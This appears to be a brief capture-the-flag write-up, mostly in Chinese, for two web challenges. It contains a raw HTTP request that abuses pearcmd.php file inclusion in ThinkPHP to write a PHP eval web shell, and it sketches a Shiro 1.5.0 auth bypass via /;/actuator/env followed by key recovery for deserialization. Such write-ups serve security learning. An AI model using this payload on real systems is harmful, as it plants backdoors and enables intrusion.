Web
easywill
TP Nday文件包含
GET /?+config-create+/&name=cfile&value=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1]);?>+/tmp/hello.php HTTP/1.1
Host: eci-2ze6yq2cnbmg51st9iod.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __jsluid_h=30528b3933fbcb220b43f1e3f659db2a; PHPSESSID=31fd5c83e847bbaefce9c16b2a6f9bee
Connection: close
Pentest in Autumn
给了pom.xml
发现有actuator。在spring2版本是actuator/env。访问有权限验证。shiro 1.5.0
/;/actuator/env即可。不能post。但是有shiro依赖。可以考虑shiro反序列化
dump下内存。用工具拿到shiro的key。base64下。指定key一把锁
